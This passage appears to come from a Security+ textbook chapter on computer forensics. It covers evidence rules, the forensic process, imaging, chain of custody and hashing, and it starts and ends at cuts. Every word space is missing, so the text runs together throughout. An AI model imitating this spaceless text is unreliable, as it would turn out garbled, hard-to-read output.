Knowingthatyouareleadingthecompany’sincidentresponseinitiative,shecomesovertoyourtableandasksifyouhavetimetoansweraquestion.Youaresurprised,butsayyes.Herquestionissimpleandtothepoint:“Canyouexplainthisincidentresponsethingtome,innontechnicalterms,soIcanrespondappropriatelyatthenextboardmeetinginthediscussion?”Inresponse,youoffertoprepareawrittenoutlinefortheCFO.Inonepage,outlinethemajorpointsthatneedtobeaddressedandgiveexamplesinlanguagesuitablefortheaudience.
2.Explaintherelationshipbetweentheanatomyofahackand
IndicatorsofCompromise.
chapter23 ComputerForensics
“HowoftenhaveIsaidtoyouthatwhenyouhaveeliminatedtheimpossible,whateverremains,howeverimprobable,mustbethetruth?”
C
—SIRARTHURCONANDOYLE
Inthischapter,youwilllearnhowto
Explorethebasicsofdigitalforensics
Identifytherulesandtypesofevidence
Collectevidence
Preserveevidence
Maintainaviablechainofcustody
Investigateacomputercrimeorpolicyviolation
Examinesystemartifacts
Developforensicpoliciesandprocedures
Examinethepoliciesandproceduresassociatedwithe-discovery
omputerforensicsiscertainlyapopularbuzzwordincomputersecurity.ThischapteraddressesthekeyaspectsofcomputerforensicsinpreparationfortheCompTIASecurity+certificationexam.Itisnot
intendedtobeatreatiseonthetopicoralegaltutorialregardingthepresentationofevidenceinacourtoflaw.Thismaterialisonlyanintroductiontothetopic,andbeforeoneentersintoforensicworkorpractice,muchadditionalstudyisnecessary.Theprinciplespresentedinthischapterareofvalueinconductinganyinvestigativeprocesses,includinginternalorexternalauditprocedures,butmanynuancesofhandlinglegalcasesarefarbeyondthescopeofthistext.
Thetermforensicsrelatestotheapplicationofscientificknowledgetolegalproblems.Specifically,computerforensicsinvolvesthepreservation,identification,documentation,andinterpretationofcomputerdata.Intoday’spractice,computerforensicscanbeperformedforthreepurposes:
Investigatingandanalyzingcomputersystemsasrelatedtoaviolationoflaw
Investigatingandanalyzingcomputersystemsforcompliancewithanorganization’spolicies
Respondingtoarequestfordigitalevidence(e-discovery)
Forensicsisoftenassociatedwithincidentresponse,theproceduresusedtorespondtoanabnormalconditioninasystem.Thereissubtledifference,however:incidentresponseisaboutcorrectiveaction—returningthesystemtoanormaloperationalstate—whereasforensicsisaboutfiguringoutwhathappened.
CrossCheckIncidentResponseIncidentresponseandassociatedpoliciesandproceduresarecoveredinChapter22.
Ifanunauthorizedpersonaccessesasystem,thatpersonlikelyhasviolatedthelaw.However,acompanyemployeewhoperformssimilaracts(accessingdataremotely)mayormaynotviolatelaws,thedeterminationofwhichdependsonmanyfactors,includingspecificauthorizationsandjobduties.Onecanviolatecorporatepolicieswhileactinglawfullywithrespecttocomputerlaws.Itisworthnotingthatknowinglyexceedingone’sauthorizationswithrespecttosystemaccessisaviolationofthelaw.Anyofthesesituationscouldultimatelyresultinlegalactionandmay
requirelegaldisclosure.Therefore,itisimportanttonotethatcomputerforensicactionsmay,atsomepointintime,dealwithlegalviolations,andinvestigationscouldgotocourtproceedings.Asapotentialfirstresponder,youshouldalwaysseeklegalcounsel.Alsoseeklegalcounselaheadoftimeasyoudevelopandimplementcorporatepoliciesandprocedures.Itisextremelyimportanttounderstandthatevenminorproceduralmisstepscanhavesignificantlegalconsequences.Theruletofollowissimple:alwaysassumethatthematerialwillbeusedinacourtoflawandthus
mustbehandledinaperfectlypropermanneratalltimes.Thisfurthermeansthatwhendealingwithforensics,youmustensurethatallstepsareperformedbyqualifiedforensicexaminers.
EvidenceEvidenceconsistsofthedocuments,verbalstatements,andmaterialobjectsthatareadmissibleinacourtoflaw.Evidenceiscriticaltoconvincingmanagement,juries,judges,orotherauthoritiesthatsomekindofviolationhasoccurred.Thesubmissionofevidenceischallenging,butitisevenmorechallengingwhencomputersareusedbecausethepeopleinvolvedmaynotbetechnicallyeducatedandthusmaynotfullyunderstandwhat’shappened.Computerevidencepresentsyetmorechallengesbecausethedataitself
cannotbeexperiencedwiththephysicalsenses—thatis,youcanseeprintedcharacters,butyoucan’tseethebitswherethatdataisstored.Bitsofdataaremerelymagneticpulsesonadiskorsomeotherstoragetechnology.Therefore,datamustalwaysbeevaluatedthroughsomekindof“filter”ratherthansenseddirectly.Thisisoftenofconcerntoauditors,becausegoodauditingtechniquesrecommendaccessingtheoriginaldataoraversionthatisascloseaspossibletotheoriginaldata.
TypesofEvidence
Thedigitalforensicprocessisatechnicallydemandingone,withnoroomforerrors.Themostcommoncauseofevidencefromaninvestigationbeingexcludedfromcourtproceedingsisspoliation,theunauthorizedalterationofdigitalevidence.Iftheforensicprocessislessthanperfect,spoliationisassumed.Thebestguidanceis1)alwaysperformforensicsasifyouaregoingtocourtwiththeevidence,and2)ifyoudonothavequalifieddigitalforensicinvestigatorsin-house,donothingtothedevice/media—letaprofessionalhandleit.
Allevidenceisnotcreatedequal.Someevidenceisstrongerandbetterthanotherevidence.Severaltypesofevidencecanbegermane:
DirectevidenceOraltestimonythatprovesaspecificfact(suchasaneyewitness’sstatement).Theknowledgeofthefactsisobtainedthroughthefivesensesofthewitness,withnoinferencesorpresumptions.
RealevidenceAlsoknownasassociativeorphysicalevidence,thisincludestangibleobjectsthatproveordisproveafact.Physicalevidencelinksthesuspecttothesceneofacrime.
DocumentaryevidenceEvidenceintheformofbusinessrecords,printouts,manuals,andthelike.Muchoftheevidencerelatingtocomputercrimesisdocumentaryevidence.
DemonstrativeevidenceUsedtoaidthejuryandcanbeintheformofamodel,experiment,chart,andsoon,offeredtoprovethataneventoccurred.
StandardsforEvidenceEvidenceinU.S.federalcourtcasesisgovernedbyaseriesoflegalprecedents,themostnotableofwhichistheDaubertstandard.ThreeU.S.SupremeCourtcasesarticulatetheDaubertstandardandshapehowmaterialsareenteredintoevidence.Fourspecificelementsareassociatedwiththeadmissionofscientificexperttestimony.Thisisimportantwithrespecttodigitalforensicsbecausetheformoftheevidencemeansthatitcanrarelyspeakforitself;rather,itmustbeinterpretedbyanexpertandpresentedtothecourt.ThefirstelementisthattheJudgeisthegatekeeper.Materialsarenot
consideredevidenceuntildeclaredsobythejudge.Thisistoensurethatexpertsaredeterminedtobeexpertsbeforethecourtreliesupontheirjudgment.Asecondelementisreliabilityandrelevance.Thetrialjudgeistodeterminethattheexpert’stestimonyisrelevanttotheproceedingsat
hand,andthattheexpert’smethodsarereliablewithrespecttothematerialbeingattestedto.Thethirdelementisthatexpertknowledgeshouldbebasedonscience,specificallysciencethatisbasedonthescientificmethodwithareplicablemethodology.Thefinalelementrelatestothisscientificmethodology,statingthatitmustbebasedonprovenscience,subjectedtopeerreview,withaknownerrorrateorpotentialerrorrateandconsensusamongthescientificcommunitythatthemethodologyisgenerallyaccepted.Aftertheseelementsaresatisfied,thejudgecanadmittheexpert’stestimonyasevidence.ThesefactorsallrelatetoaU.S.federalcourtdecisionandthereforeare
onlybindingintheU.S.federaljudiciary,butthetestisrecognizedandappliedinsimilarformatmanylevelsofjurisdiction.Thebottomlineissimple:thedatacan’tspeakforitself,andexpertswhocaninterpretthedataoperateunderstrictguidelineswithrespecttoconduct,qualifications,principles,andmethods.Tobecredible,especiallyifevidencewillbeusedincourtproceedings
orincorporatedisciplinaryactionsthatcouldbechallengedlegally,evidencemustmeetthreestandards:
SufficientevidenceItmustbeconvincingormeasureupwithoutquestion.
CompetentevidenceItmustbelegallyqualifiedandreliable.RelevantevidenceItmustbematerialtothecaseorhaveabearingonthematterathand.
TechTip
EvidenceControlMentalChecklistKeepthesepointsinmindasyoucollectevidence:
Whocollectedtheevidence?
Howwasitcollected?
Wherewasitcollected?
Whohashadpossessionoftheevidence?Howwasitprotectedandstored?
Whenwasitremovedfromstorage?Why?Whotookpossession?
ThreeRulesRegardingEvidenceAnitemcanbecomeevidencewhenitisadmittedbyajudgeinacase.Threerulesguidetheuseofevidencewithregardtoitsuseincourtproceedings:
BestevidenceruleCourtspreferoriginalevidenceratherthanacopytoensurethatnoalterationoftheevidence(whetherintentionalorunintentional)hasoccurred.Insomeinstances,anevidenceduplicatecanbeaccepted,suchaswhentheoriginalislostordestroyedbyactsofGodorinthenormalcourseofbusiness.Aduplicateisalsoacceptablewhenathirdpartybeyondthecourt’ssubpoenapowerpossessestheoriginal.
ExclusionaryruleTheFourthAmendmenttotheU.S.Constitutionprecludesillegalsearchandseizure.Therefore,anyevidencecollectedinviolationoftheFourthAmendmentisnotadmissibleasevidence.Additionally,ifevidenceiscollectedinviolationoftheElectronicCommunicationsPrivacyAct(ECPA)orotherrelatedprovisionsoftheU.S.Code,itmaynotbeadmissibletoacourt.Forexample,ifnopolicyexistsregardingthecompany’sintenttomonitornetworktrafficorsystemselectronically,andtheemployeehasnotacknowledgedthispolicybysigninganagreement,sniffingtheemployee’snetworktrafficcouldbeaviolationoftheECPA.
HearsayruleHearsayissecondhandevidence—evidenceofferedbythewitnessthatisnotbasedonthepersonalknowledgeofthewitnessbutisbeingofferedtoprovethetruthofthematterasserted.Typically,computer-generatedevidenceisconsideredhearsay
evidence,asthemakeroftheevidence(thecomputer)cannotbeinterrogated.Thereareexceptionsbeingmadewhereitemssuchaslogsandheaders(computer-generatedmaterials)arebeingacceptedincourt.Thereareexceptions,buttheyrarelyapplytodigitalevidence.
ThelawsmentionedhereareU.S.laws.Othercountriesandjurisdictionsmayhavesimilarlawsthatwouldneedtobeconsideredinasimilarmanner.
ForensicProcessForensicsistheuseofscientificmethodsintheanalysisofmattersinconnectionwithcrimeorotherlegalmatters.Becauseoftheconnectiontolaw,itisanexactingprocess,withnoroomforerror.Indigitalforensics,theissueofalterationbecomesparamount,becausechanging1’sto0’sdoesnotleaveatraceinmanysituations.Becauseoftheissueofcontaminationorspoliationofevidence,detailedprocessesareusedintheprocessingofinformation.Fromahigh-levelpointofview,multiplestepsareemployedinadigital
forensicinvestigation:
1.IdentificationRecognizeanincidentfromindicatorsanddetermineitstypeandscope.Thisisnotexplicitlywithinthefieldofforensicsbutissignificantbecauseitimpactsothersteps.Whattoolswereused?Howmanysystemsareinvolved?Howmuchdataistobecopied?Thesequestionsallhaveramificationsonthesuccessfuloutcomeofaforensicprocess.
2.PreparationPreparetools,techniques,andsearchwarrantsandmonitorauthorizationsandmanagementsupport.
3.Approach/strategyDynamicallyformulateanapproachbasedonpotentialimpactonbystandersandthespecifictechnologyin
question.Thegoalofthestrategyshouldbetomaximizethecollectionofuntaintedevidencewhileminimizingimpacttothevictimorowner.
4.PreservationIsolate,secure,andpreservethestateofphysicalanddigitalevidence.Thisincludespreventingpeoplefromusingthedigitaldeviceorallowingotherelectromagneticdevicestobeusedwithinacertainproximity.Properpreservationisessentialtopreventalterationofthesource.
5.CollectionRecordthephysicalsceneandduplicatedigitalevidenceusingstandardizedandacceptedprocedures.Thisiswhereadigitalcameraandmicrophonearevitaltoolsforcapturingdetails—serialnumbers,layouts,andsoforth—quicklyanddefinitively.
6.ExaminationIn-depth,systematicsearchofevidencerelatingtothesuspectedcrime.Thisstepoccurslater,inalab,andfocusesonidentifyingandlocatingpotentialspecificevidenceelements,possiblywithinunconventionallocations.Itisimportanttoconstructdetaileddocumentationforanalysis,documentingthemetadataanddatavaluesthatmayberelevanttotheissuesathandintheinvestigation.
7.AnalysisDeterminesignificance,reconstructfragmentsofdata,anddrawconclusionsbasedontheelementsofevidencefound.Thedataitselfcannottellastory,andinthissteptheinvestigatorweavestheelementsintoapicture,hopefullytheonlyonethatcanbesupported.Althoughtheintuitionistoproveguilt,theskilledandseasonedinvestigatorfocusesonpaintingthepicturethatthedatadescribes,regardlessofoutcome,andmakingitcomprehensiveandcompletesothatitwillstanduptochallenge.Multiplepeoplewithdifferentskillsetsmaybeneededtocompletethepicture.
8.PresentationSummarizeandprovideanexplanationoftheconclusions.Theresultsshouldbewritteninlayperson’stermsusingabstractedterminology.Ifyoucannotexplaintheinformation
toanontechnicallayperson,thenyoudonotunderstanditwellenoughtocompletethisaspect.Allabstractedterminologyshouldreferencethespecificdetailsofthecase.
9.ReturningevidenceEnsurephysicalanddigitalpropertyisreturnedtoitsproperowneranddeterminehowandwhatcriminalevidencemustberemoved.(Forexample,hardwaremaybereturned,butimagesofchildpornographywouldberemoved.)Thisisnotanexplicitstepofforensicinvestigation,andmostmodelsthataddresshowtoseizeevidencerarelyaddressthisaspect.Butattheendoftheday,thejobisnotdoneuntilallaspectsarefinished,andthisincludesthislevelofclean-upactivity.
Wheninformationorobjectsarepresentedtomanagementoradmittedtocourttosupportaclaim,thatinformationorthoseobjectscanbeconsideredasevidenceordocumentationsupportingyourinvestigativeefforts.Seniormanagementwillalwaysaskalotofquestions—second-andthird-orderquestionsthatyouneedtobeabletoanswerquickly.Likewise,inacourt,credibilityiscritical.Therefore,evidencemustbeproperlyacquired,identified,protectedagainsttampering,transported,andstored.
ExamTip:Adigitalcameraisgreatforrecordingasceneandinformation.Screenshotsofactivemonitorimagesmaybeobtainedaswell.Picturescandetailelementssuchasserialnumberplates,machines,drives,cableconnections,andmore.Photographsaretrulyworthathousandwords.
AcquiringEvidenceWhenanincidentoccurs,youwillneedtocollectdataandinformationtofacilitateyourinvestigation.Ifsomeoneiscommittingacrimeorintentionallyviolatingacompanypolicy,shewilllikelytrytohideher
tracks.Therefore,youshouldcollectasmuchinformationassoonasyoucan.Intoday’shighlynetworkedworld,evidencecanbefoundnotonlyontheworkstationorlaptopcomputer,butalsooncompany-ownedfileservers,securityappliances,andserverslocatedwiththeInternetserviceprovider(ISP).
TechTip
DataVolatilityFromthemostvolatiletothemostpersistent:
1.CPUstorage(registers/cache)2.Systemstorage(RAM)
3.Kerneltables4.Fixedmedia
5.Removablemedia6.Output/hardcopy
Afirstrespondermustdoasmuchaspossibletocontroldamageorlossofevidence.Obviously,astimepasses,evidencecanbetamperedwithordestroyed.Lookaroundonthedesk,ontheRolodex,underthekeyboard,indesktopstorageareas,andoncubiclebulletinboardsforanyinformationthatmightberelevant.Securefloppydisks,opticaldiscs,flashmemorycards,USBdrives,tapes,andotherremovablemedia.Requestcopiesoflogsassoonaspossible.MostISPsprotectlogsthatcouldbesubpoenaed.Takephotos(somelocalitiesrequireuseofPolaroidphotos,astheyaremoredifficulttomodifywithoutobvioustampering)orvideo.Includephotosofoperatingcomputerscreensandhardwarecomponentsfrommultipleangles.Besuretophotographinternalcomponentsbeforeremovingthemforanalysis.
MicrosoftproducedaforensictoolforlawenforcementcalledCOFEE(ComputerOnlineForensicsEvidenceExtractor)thatcanbeusedtocollectawiderangeofdatafromasuspectmachine.Restrictedbylicensetolawenforcement,itisoutofreachformostinvestigators.Anexaminationofhowitfunctionsprovidesusefulinformation,andmanyofitsfunctionscanbereadilycopiedbyinvestigators.COFEEisawrapperforawholehostofutilities—thinkSysinternalsandmore—allintegratedbyscript.Thisautomatedprocesscanbere-createdbyanycompetentforensicinvestigator.Automatedscriptsandtoolsreduceerrorsandincreaseeffectiveness.
Whenanincidentoccursandthecomputerbeingusedisgoingtobesecured,youmustconsidertwoquestions:Shoulditbeturnedoff,andshoulditbedisconnectedfromthenetwork?Forensicprofessionalsdebatethereasonsforturningacomputeronorturningitoff.Somestatethattheplugshouldbepulledinordertofreezethecurrentstateofthecomputer.However,thisresultsinthelossofanydataassociatedwithanattackinprogressfromthemachine.AnydatainRAMwillalsobelost.Further,itmaycorruptthecomputer’sfilesystemandcouldcallintoquestionthevalidityofyourfindings.
ExamTip:Filetimestampsmaybeofuseduringtheanalysisphase.Tocorrelatefiletimestampstoactualtime,itisimportanttoknowthetimeoffsetbetweenthesystemclockandrealtime.Recordingthetimeoffsetwhilethesystemisliveiscriticalifthesystemclockisdifferentthanactualtime.
Imagingordumpingthephysicalmemoryofacomputersystemcanhelpidentifyevidencethatisnotavailableonaharddrive.Thisisespeciallyappropriateforrootkits,forwhichevidenceontheharddriveishardtofind.Oncethememoryisimaged,youcanuseahexeditortoanalyzetheimageofflineonanothersystem.(Memory-dumpingtoolsandhexeditorsareavailableontheInternet.)Notethatdumpingmemoryismoreapplicableforinvestigativeworkwherecourtproceedingswillnotbe
pursued.Ifacaseislikelytoendupincourt,donotdumpmemorywithoutfirstseekinglegaladvicetoconfirmthatliveanalysisofthememoryisacceptable;otherwise,thedefendantwilleasilybeabletodisputetheclaimthatevidencewasnottamperedwith.Ontheotherhand,itispossibleforthecomputercriminaltoleave
behindasoftwarebombthatyoudon’tknowabout,andanycommandsyouexecute,includingshuttingdownorrestartingthesystem,coulddestroyormodifyfiles,information,orevidence.Thecriminalmayhaveanticipatedsuchaninvestigationandalteredsomeofthesystem’sbinaryfiles.WhileteachingattheUniversityofTexas,Austin,Dr.LarryLeibrock
ledaresearchprojecttoquantifyhowmanyfilesarechangedwhenturningoffandonaWindowsworkstation.Theresearchdocumentsthatapproximately0.6percentoftheoperatingsystemfilesarechangedeachtimeaWindowsXPsystemisshutdownandrestarted.Anadministratorlookingatamachineatthebehestofmanagementcancompletelyobfuscateanydatathatcouldberecovered,aprocesscalledspoliation.Thiscannotbeundoneandrendersthedataunusableinlegalproceedings,whethercourtorhumanresources.
ExamTip:ForCompTIASecurity+testingpurposes,rememberthis:thememoryshouldbedumped,thesystemshouldbepowereddowncleanly,andanimageshouldbemadeandusedasyouwork.
Further,ifthecomputerbeinganalyzedisaserver,itisunlikelymanagementwillsupporttakingitofflineandshuttingitdownforinvestigation.So,fromaninvestigativeperspective,eithercoursemaybecorrectorincorrect,dependingonthecircumstancessurroundingtheincident.Whatismostimportantisthatyouaredeliberateinyourwork,youdocumentyouractions,andyoucanexplainwhyyoutooktheactionsyouperformed.
Manyinvestigativemethodsareused.Figure23.1showsthecontinuumofinvestigativemethodsfromsimpletomorerigorous.
•Figure23.1Investigativemethodrigor
Figure23.2showstherelationshipbetweenthecomplexityofyourinvestigationandboththereliabilityofyourforensicdataandthedifficultyofinvestigation.
•Figure23.2Requiredrigoroftheinvestigativemethodversusbothdatareliabilityandthedifficultyofinvestigation
IdentifyingEvidenceEvidencemustbeproperlymarkedasitiscollectedsothatitcanbeidentifiedasaparticularpieceofevidencegatheredatthescene.Properlylabelandstoreevidence,andmakesurethelabelscan’tbeeasilyremoved.Keepanevidencecontrollogbookidentifyingeachpieceofevidence(incasethelabelisremoved);thepersonswhodiscoveredit;thecasenumber;thedate,time,andlocationofthediscovery;andthereasonforcollection.Keepalogofallstaffhoursandexpenses.Thisinformationshouldbespecificenoughforrecollectionlaterincourt.Itisimportanttologotheridentifyingmarks,suchasdevicemake,model,serialnumber,cableconfigurationortype,andsoon.Noteanytypeofdamagetothepieceofevidence.
Youshouldneverexamineasystemwiththeutilitiesprovidedbythatsystem.Youshouldalwaysuseutilitiesthathavebeenverifiedascorrectanduncorrupted.Evenbetter,useaforensicworkstation,acomputersystemspecificallydesignedtoperformcomputerforensicactivities.Donotopenanyfilesorstartanyapplications.Ifpossible,documentthecurrentmemoryandswapfiles,runningprocesses,andopenfiles.Disconnectthesystemfromthenetworkandimmediatelycontactseniormanagement.Unlessyouhaveappropriateforensictrainingandexperience,considercallinginaprofessional.
Beingmethodicalisextremelyimportantwhenidentifyingevidence.Donotcollectevidencebyyourself—haveasecondpersonwhocanserveasawitnesstoyouractions.Keeplogsofyouractionsduringbothseizureandduringanalysisandstorage.Asamplelog,providingtheminimumcontentsofanevidencecontrollogbookentry,isshownhere:
Third-partyinvestigatorsarecommonlyusedincivilmatters.Whendoingdigitalforensicsforacivillitigation–basedcase,itisimportanttoconsultwiththeretainingcounselconcerningthelevelofdetailandrecordsdesired.Incivillitigation,anythingwrittenwillberequestedtobedisclosedduringpretrialdiscovery.Thiscanprovidestrategydisclosurebeyondwhatisdesiredbycounsel.Thealternativeistokeepminimalrequiredrecordsasdeterminedbycounsel.
ProtectingEvidenceProtectevidencefromelectromagneticormechanicaldamage.Ensurethatevidenceisnottamperedwith,damaged,orcompromisedbytheproceduresusedduringtheinvestigation.Thishelpsavoidpotentialliabilityproblemslater.Protectevidencefromextremesinheatandcold,humidity,water,magneticfields,andvibration.Usestatic-freeevidence-protectionglovesasopposedtostandardlatexgloves.Sealtheevidenceinapropercontainerwithevidencetape,andmarkitwithyourinitials,date,andcasenumber.Forexample,ifamobilephonewithadvancedcapabilitiesisseized,itshouldbeproperlysecuredinahardcontainerdesignedtopreventaccidentallypressingthekeysduringtransitandstorage.Ifthephoneistoremainturnedonforanalysis,radiofrequencyisolationbagsthatattenuatethedevice’sradiosignalshouldbeused.Thiswillpreventremotewiping,locking,ordisablingofthedevice.
TransportingEvidenceProperlylogallevidenceinandoutofcontrolledstorage.Useproperpackingtechniques,suchasplacingcomponentsinstatic-freebags,usingfoampackingmaterial,andusingcardboardboxes.Beespeciallycautiousduringtransportofevidencetoensurecustodyofevidenceismaintainedandtheevidenceisn’tdamagedortamperedwith.
TechTip
ProtectingEvidenceAnyandallcollecteddigitalevidenceneedstobeprotectedfromawiderangeofpotentiallosses—environmental,theft,actualloss,alteration,physicalorelectricaldamage,oreventheperceptionofthepossibilityoflossoccurring.Inanylegalproceeding,whethercriminalorcivil,theotherpartywillalwaysexaminethestorageconditionsand,iflessthanperfect,placetheburdenonthepersonstoringittoprovethatitisstillintact.Thisisjustonereasonwhyrecordinghashvaluesuponcollectionissoimportant.
StoringEvidenceStoretheevidenceinanevidenceroomthathaslowtraffic,restrictedaccess,cameramonitoring,andentry-loggingcapabilities.Storecomponentsinstatic-freebags,foampackingmaterial,andcardboardboxes,andinsidemetaltamper-resistantcabinetsorsafeswheneverpossible.Manyoftoday’selectronicsaresensitivetoenvironmentalfactors.Itisimportantforstorageareastohaveenvironmentalcontrolstoprotectdevicesfromtemperatureandhumiditychanges.Itisalsoprudenttohaveenvironmental-monitoringdevicestoensurethattemperatureandhumidityremainwithinsaferangesforelectronicdevices.
ConductingtheInvestigationWhenanalyzingcomputerstoragecomponents,youmustuseextreme
caution.Acopyofthesystemshouldbeanalyzed—nevertheoriginalsystem,asthatwillhavetoserveasevidence.Asystemspeciallydesignedforforensicexamination,knownasaforensicworkstation,canbeused.Forensicworkstationstypicallycontainharddrivebays,writeblockers,analysissoftware,andotherdevicestosafelyimageandprotectcomputerforensicdata.Analysisshouldbedoneinacontrolledenvironmentwithphysicalsecurityandcontrolledaccess.
ExamTip:Neveranalyzetheseizedsystemdirectly.Alwaysmakemultipleimagesofthedeviceandanalyzeacopy.
TechTip
ToolsoftheTradeDiskwipeutilitiesToolstocompletelydeletefilesandoverwritecontentsFileviewersTextandimageviewers
ForensicprogramsToolstoanalyzediskspace,filecontent,systemconfiguration,andsoon
ForensicworkstationsSpecializedworkstationscontaininghardware,software,andcomponentinterfacecapabilitiestoperformcomputerforensicactivities
HarddrivetoolsPartition-viewingutilities,bootableCDsUnerasetoolsToolstoreversefiledeletions
Rememberthatwitnesscredibilityisextremelyimportant.Itiseasytoimaginehowquicklycredibilitycanbedamagedifthewitnessisasked,“Didyoulockthefilesystem?”andcan’tansweraffirmatively.Or,whenasked,“Whenyouimagedthisdiskdrive,didyouuseanewsystem?”thewitnesscan’tanswerthatthedestinationdiskwasneworhadbeencompletelyformattedusingalow-levelformatbeforedatawascopiedto
it.Oneofthekeyelementstopreservingthechainofcustody,protecting
evidence,andhavingcopiesofdataforanalysisistheconceptofdigitalforensicduplicationofdata.Adigitalforensiccopyisacarefullycontrolledcopythathaseverybitthesameastheoriginal.Notjustfiles,butalldatastructuresassociatedwiththedevice,includingunusedspace,arecopiedinadigitalforensicimagecopy,everybit,bitbybit.Makingthistypeofcopyisnotsomethingdonewithnormalfileutilities;specialtyprogramsarerequired.
Whenconductingadigitalforensicinvestigation,considerlocallaws.Manystatesrequirethatindependentinvestigatorsbelicensedprivateinvestigators.Ifyouareworkingasananalystonin-housesystems,thelawsmayhavedifferinglevelsofapplicability.Beforeconsulting,itisbesttoinvestigatetheneedofalicense.
Itisalsoimportantnottointerfacewiththedigitalmediausingthehostsystem,asallfilesystemsbothreadandwritetothestoragemediaaspartoftheirnormaloperation,alteringthemedia.Thistypeofalterationchangesinformation,potentiallydamagingthetraceevidenceneededintheinvestigation.Forthisreason,awriteblockeriscommonlyusedtoconnectthemediatotheinvestigator’scomputer.Figure23.3showsakitthatcontainsbothwriteblockersandaforensicduplicator.
•Figure23.3(a)Writeblockerdevicesand(b)forensicduplicatordevice
Itiscommonforforensicduplicatordevicestohaveadditionalfeaturestoassistaninvestigator,suchasmakingmultiplecopiesatonceandcalculatinghashvaluesforthedeviceandtheduplicate.Capturingthehashvaluesforallitemsisanessentialfirststepinhandlinganydigitalevidence.
TechTip
Forensics-BasedDriveImagingWhenaforensicinvestigationonaseriesofcomputersisneededtodeterminefactsinacomputerinvestigation,avarietyofmethodscanbeusedtodiscoverandrecovertheevidence.Forexample,ifadevelopergroupisbeinginvestigated,theinvestigatorcouldlookateachmachineandfindthespecificevidencethatisbeingsought.Theproblemwiththisapproachisthatintheprocessofdoingtheinvestigation,theotherdevelopersintheareabecomeawareandhaveachancetodestroycriticalevidence.Forthisreason,andtominimizedisruptiontoateam,manytimestheinvestigationbeginswithalarge-scaleforensicduplicationeffort.Thestepsareremarkablysimpleandwellpracticedbymanyinvestigativefirms:
1.Documentthescopeofthemachinesbeinginvestigated,notingthenumberofdrivesandsizes.
2.Sendinateamafterhourstodotheduplication.3.Openeachmachine,disconnecttheharddrives,andattachexternalcables.
4.Duplicateeachdriveusingaforensicduplicationprocedurethatmakesacompleteimageoftheharddriveonaseparatemediasource.
5.Reassemblethemachines,leavingnoevidencethattheduplicationwasperformed.
Theforensicimagesarethenexaminedonebyoneatalatertime,awayfrominquisitiveandpryingeyes.
AnalysisAftersuccessfullyimagingthedrivestobeanalyzedandcalculatingandstoringthemessagedigests,theinvestigatorcanbegintheanalysis.Thedetailsoftheinvestigationwilldependontheparticularsoftheincidentbeinginvestigated.However,ingeneral,thefollowingstepswillbeinvolved:
Thenumberoffilesstoredontoday’sharddrivescanbeverylarge,literallyhundredsofthousandsoffiles.Obviouslythisisfartoomanyfortheinvestigatortodirectlyanalyze.However,bymatchingthemessagedigestsforfilesinstalledbythemostpopularsoftwareproductstothemessagedigestsoffilesonthedrivebeinganalyzed,theinvestigatorcanavoidanalyzingapproximately90percentofthefilesbecausehecanassumetheyareunmodified.TheNationalSoftwareReferenceLibrary(NSRL)collectssoftwarefromvarioussourcesandincorporatesfileprofilesintoaReferenceDataSetavailablefordownloadasaservice.Seewww.nsrl.nist.gov.
1.ChecktheRecycleBinfordeletedfiles.2.Checkthewebbrowserhistoryfilesandaddressbarhistories.3.Checkthewebbrowsercookiefiles.Differentwebbrowsersstore
cookiesindifferentplaces.
4.ChecktheTemporaryInternetFilesfolders.
5.Searchfilesforsuspectcharacterstrings.Toconservevaluabletime,bewiseinthechoiceofwordsyousearchfor,choosing“confidential,”“sensitive,”“sex,”orotherexplicitwordsandphrasesrelatedtoyourinvestigation.
6.Searchtheslackandfreespaceforsuspectcharacterstringsasdescribedpreviously.
TheCAINEComputerForensicsLinuxLiveDistroandSANSInvestigativeForensicToolkit(SIFT)arejusttwoexamplesofthemanytoolsyoucanusetoperformcomputerforensicactivities.
TechTip
Cleanup:PossibleRemediationActionsAfteranAttackThesearethingsyou’llneedtodotorestoreyoursystemafteryou’verespondedtoanincidentandcompletedyourinitialinvestigation:
Placethesystembehindafirewall.ReloadtheOS.
Runscanners.Installsecuritysoftware.
Removeunneededservicesandapplications.Applypatches.
Restorethesystemfrombackup.
ChainofCustodyEvidence,oncecollected,mustbeproperlycontrolledtopreventtampering.Thechainofcustodyaccountsforallpersonswhohandledorhadaccesstotheevidence.Thechainofcustodyshowswhoobtainedthe
evidence,whenandwhereitwasobtained,whereitwasstored,andwhohadcontrolorpossessionoftheevidencefortheentiretimesincetheevidencewasobtained.Thefollowingshowscriticalstepsinachainofcustody:
1.Recordeachitemcollectedasevidence.2.Recordwhocollectedtheevidence,alongwiththedateandtimeit
wascollectedorrecorded.
3.Writeadescriptionoftheevidenceinthedocumentation.4.Puttheevidenceincontainersandtagthecontainerswiththecase
number,thenameofthepersonwhocollectedit,andthedateandtimeitwascollectedorputinthecontainer.
5.Recordallmessagedigest(hash)valuesinthedocumentation.6.Securelytransporttheevidencetoaprotectedstoragefacility.7.Obtainasignaturefromthepersonwhoacceptstheevidenceatthis
storagefacility.
8.Providecontrolstopreventaccesstoandcompromiseoftheevidencewhileitisbeingstored.
9.Securelytransporttheevidencetocourtforproceedings.
MessageDigestandHashIffiles,logs,andotherinformationaregoingtobecapturedandusedforevidence,youneedtoensurethatthedataisn’tmodified.Inmostcases,atoolthatimplementsahashingalgorithmtocreatemessagedigestsisused.
Themathematicsbehindhashingalgorithmshasbeenresearchedextensively,andalthoughitis
possiblethattwodifferentdatastreamscouldproducethesamemessagedigest,itisveryimprobable.MostforensictoolsstillreportMD5hashes,althoughtheindustryisshiftingtoSHA-2andSHA-3seriesandthetoolsarecatchingup.HashingiscoveredindetailinChapter5.
CrossCheckHashAlgorithmsandForensicsHashalgorithmsofferdigitalforensicstheabilityto“bagandtag”evidence.Althoughitdoesnotprotecttheevidencefromtampering,itprovidesclearproofofwhetherornotdatahasbeenchanged.Thisisaveryimportantissuetoresolve,givenhoweasyitistochangedigitaldataandthefactthattypicallynotraceisleftofthechange.AcompletereviewofhashingalgorithmsisfoundinChapter5.Theimportantquestionregardinghashesandforensicsisthis:Howandwheredoyourecordhashvaluestoprotecttheirintegrityaspartoftheinvestigativeprocess?
Ahashingalgorithmperformsafunctionsimilartothefamiliarparitybits,checksum,orcyclicalredundancycheck(CRC).Itappliesmathematicaloperationstoadatastream(orfile)tocalculatesomenumberthatisuniquebasedontheinformationcontainedinthedatastream(orfile).Ifasubsequenthashcreatedonthesamedatastreamresultsinadifferenthashvalue,itusuallymeansthatthedatastreamwaschanged.Thehashtoolisappliedtoeachfileorlog,andthemessagedigestvalue
